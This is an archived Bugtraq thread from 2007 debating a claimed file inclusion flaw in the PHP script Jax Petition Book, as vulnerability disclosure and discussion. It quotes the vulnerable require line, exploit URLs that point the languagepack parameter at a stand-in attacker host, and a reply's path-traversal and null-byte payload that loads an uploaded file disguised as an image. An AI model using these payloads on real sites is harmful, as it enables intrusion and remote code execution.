Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

From: John McGuire <bugtraq () greeneandassoc com>
Date: Tue, 16 Jan 2007 11:51:31 -0700
Actually, this can be pretty serious depending on server settings, but an improper example was given. 

Better one:

jax_petitionbook.php?languagepack=../../some_other_allowed_file_uploads/myfile.php.gif%00


Many servers will have magic quotes on to defeat the null byte, but by no means all.

John



bmatheny () mobocracy net wrote:


This is not a vulnerability. Since $languagepack is prefixed by "language/",
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.

Can we stop with the PHP 'vulnerabilities' that aren't?

-Blake

Whatchu talkin' 'bout, Willis?

------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip

*Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

-------------------------------------------------------------------------------------------------------------------

*Code:

require ( "language/" .$languagepack . ".inc.php" );

-------------------------------------------------------------------------------------------------------------------
*Exploit: 
jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
Special Tnx: AYYILDIZ.ORG
Previous By Date Next
Previous By Thread Next

Current thread: